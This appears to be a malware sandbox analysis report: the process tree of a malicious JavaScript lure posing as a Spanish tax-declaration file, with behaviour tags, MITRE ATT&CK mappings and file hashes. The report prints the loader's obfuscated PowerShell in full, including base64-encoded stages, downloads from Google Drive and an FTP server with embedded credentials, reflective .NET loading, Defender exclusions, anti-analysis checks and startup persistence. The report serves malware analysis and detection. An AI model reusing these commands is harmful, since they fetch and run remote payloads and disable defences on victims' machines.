'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAEwAUQ' + [char]66 + 'RAEEAQgAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'xAGIAcw' + [char]66 + 'xAHMAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASg' + [char]66 + '1AGsAcA' + [char]66 + 'WACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAGEAZQ' + [char]66 + 'EAHcAVQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'GAHkAZg' + [char]66 + 'kAHoAIAApAC4AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lADIANgAyADIAZQ' + [char]66 + 'iADkANAA5ADUAOQAtADgANAA4AGIALQ' + [char]66 + 'lADUAYwA0AC0AMAA0AGQAYwAtAGUANwAyAGUANAAyADkAZAA9AG4AZQ' + [char]66 + 'rAG8AdAAmAGEAaQ' + [char]66 + 'kAGUAbQA9AHQAbA' + [char]66 + 'hAD8AdA' + [char]66 + '4AHQALg' + [char]66 + 'sAG8AZw' + [char]66 + '1AGgALw' + [char]66 + 'vAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AG8AcA' + [char]66 + 'zAHAAcA' + [char]66 + 'hAC4AOA' + [char]66 + 'lADcAZQA4AC0Acw' + [char]66 + 'vAGkAcg' + [char]66 + 'hAG4Abw' + [char]66 + 'sAGwAbw' + [char]66 + 'tAC8AYgAvADAAdgAvAG0Abw' + [char]66 + 'jAC4Acw' + [char]66 + 'pAHAAYQ' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAZw' + [char]66 + 'hAHIAbw' + [char]66 + '0AHMAZQ' + [char]66 + 'zAGEAYg' + [char]66 + 'lAHIAaQ' + [char]66 + 'mAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQASQ' + [char]66 + 'uAHMAdA' + [char]66 + 'hAGwAbA' + [char]66 + 'VAHQAaQ' + [char]66 + 'sACcAJwAgACAAKQAgACkAOwAnADsAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADMALg' + [char]66 + 'wAHMAMQAnACkAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sACAALQ' + [char]66 + 'FAHgAZQ' + [char]66 + 'jAHUAdA' + [char]66 + 'pAG8Abg' + [char]66 + 'QAG8AbA' + [char]66 + 'pAGMAeQAgAEIAeQ' + [char]66 + 'wAGEAcw' + [char]66 + 'zACAALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA7AH0AOwA=';$nKvfY = $nKvfY.replace('革','B') ;$nKvfY = [System.Convert]::FromBase64String( $nKvfY ) ;;;$nKvfY = [System.Text.Encoding]::Unicode.GetString( $nKvfY ) ;$nKvfY = $nKvfY.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js') ;powershell $nKvfY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$cIOeC = $host.Version.Major.Equals(2);If ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$qvjjf = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $Xumfi ) {$qvjjf = ($qvjjf + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$qvjjf = ($qvjjf + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$xxwtl = ( New-Object Net.WebClient ) ;$xxwtl.Encoding = [System.Text.Encoding]::UTF8 ;$xxwtl.DownloadFile($qvjjf, ($HzOMj + '\Upwin.msu') ) ;$UwfwZ = ( 'C:\Users\' + [Environment]::UserName );JCCGX = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$qbsqs = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $qbsqs ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''e2622eb94959-848b-e5c4-04dc-e72e429d=nekot&aidem=tla?txt.loguh/o/moc.topsppa.8e7e8-soiranollom/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js'' , ''D DDInstallUtil'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"5⤵PID:5096
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1'"5⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1'"5⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vmumy.ps1"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pesister.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js"5⤵PID:420
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Window
1Indicator Removal
1File Deletion
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1
Filesize426B
MD575950c063ff8b1fdacdae0f32cd31ff8
SHA1849e5d9389b40e823fce61359cdc28dd171a60ee
SHA256885c69a4c4d6153e400b37a36ce99de8ee7b5318c9ecf91d674a5d8cf9840c75
SHA512561cca26172c654d458ef456ab3aca9f27aab5a23198a54cf6aa614b85b4cfe0c6983458e1973d9312a7d189e04a41121053f51a7fa2bfa411ade7f80527e8f9
-
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1
Filesize431B
MD54918ed2c374d2301b01b4936277ed4fb
SHA17ac4d3b8007c8470981f85c2bf789d6952beb44d
SHA2560df4d86827e02791f1c44daebac8257fe79ff96bbf5a87ff974f2af6dcfa90bb
SHA5123b19f79f8ded9132ce0e65c81627e18bb7f75a1882bae4b7800dabb6b20e392cce93331d36f74c202f61660ce1ed67f5efc35da88840c8d6a08fad87e787ec40
-
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pesister.ps1
Filesize231B
MD558ccc24156d607ef8fd1ba850f8f7bc0
SHA15883c608d1c82b66837a6bf57edafde42c650862
SHA256786b29a1a80ba6374d169d5a3c838f8e77e9a2781c408022c0c108c4971d1615
SHA512adc3d354ff6c1c147826ac9925377da2c6fea01499edf8e1f4cf787bed261862ef0bcfef9d17a70f7353485b8e1609106ff0351cbde96affe6bea2415f89b63a
-
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vmumy.ps1
Filesize245KB
MD5bee53d171b3dae17cda2a98a48ba6274
SHA1e5bf8e641efa0f436be13a597ad677c352020438
SHA256d7e6eda689410d5dbf794d34a672f54cbb4a5b46474e789ec03a0d00b97d8a29
SHA512b373cbd3d2cd0fe8116c1db485e3ace248b8df8871984decc6e916050f6b9c84c83956652b5e2a5244c119ae1d2e5cb1884f85528e4176d1ba68810423fd6111
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD54f60d0254037d7a35064b1f678a42ed7
SHA18b9e62758829680cfc69d351688c27608b96a52c
SHA2569eb5d62e311b4e8dd6cb6eeeb0ae5ddc04cb131676b706bbb3c0d46bb760403b
SHA5120de0aa7131ff4235b23715004c6f5f433b355227ac2620f46a809d4a3296002c888ef03547fd9bb31bc0885d3abae0e733d3e279f4ffb0268aa30b4cfac8e9de
-
Filesize
64B
MD5fbe40407f15453ad348c7ed3536fe05c
SHA1d33ebdf2ec1b163c15637e79c03db4f5e0133ed1
SHA256b134644f9f3f03a8f5b50c1e72364b0764fb770bd074d1a0058bfedfda041f38
SHA51281a5434db9460434903fb1037c330eb0ad2bd413a7a52935958b10020bb4c2e1789004f629d7cde9e1566d43362a4e1fd0cc316c2dda36ba5218b712cea5d0d9
-
Filesize
1KB
MD5d096831023867930e62e6d8b3d4d8ca6
SHA1404a1e73dc1590f1c8b9327c396591567dac7365
SHA256167f75b42ae614a8d6b0497779ff12f09605328533487f235b029e0db03ad23b
SHA51231333100ddd8e04bf730118ea800843720c0f3fb69e27b89dda7fa4d717d25e838ad55a0919d47a44dd8a78d724ef8c105cfa230987cc46ba94a2b790ff91b75
-
Filesize
948B
MD5c1a54dd5a1ab44cc4c4afd42f291c863
SHA1b77043ab3582680fc96192e9d333a6be0ae0f69d
SHA256c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
SHA512010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d
-
Filesize
64B
MD5412190095aa22003e76921475e241046
SHA18ded8197516a79fda05a7044f3a9249372ac42ba
SHA2562719d9049d1c5b9c03be4a8317a546f8cec012e0a471d7e0aa260cfa7fc64acf
SHA5122110768c472fdfd683c9ff96c1f37d72bb2d52e089c1b23261572bb1bafd125b42074169c366a387310e7ad046daa85e811c79a90527f4721035bce9690d3f56
-
Filesize
1KB
MD5e85a6288280abfff891acf1c4d6f1d85
SHA191022f7d6a5fd05583cec40e0fa8ac3c99008f8a
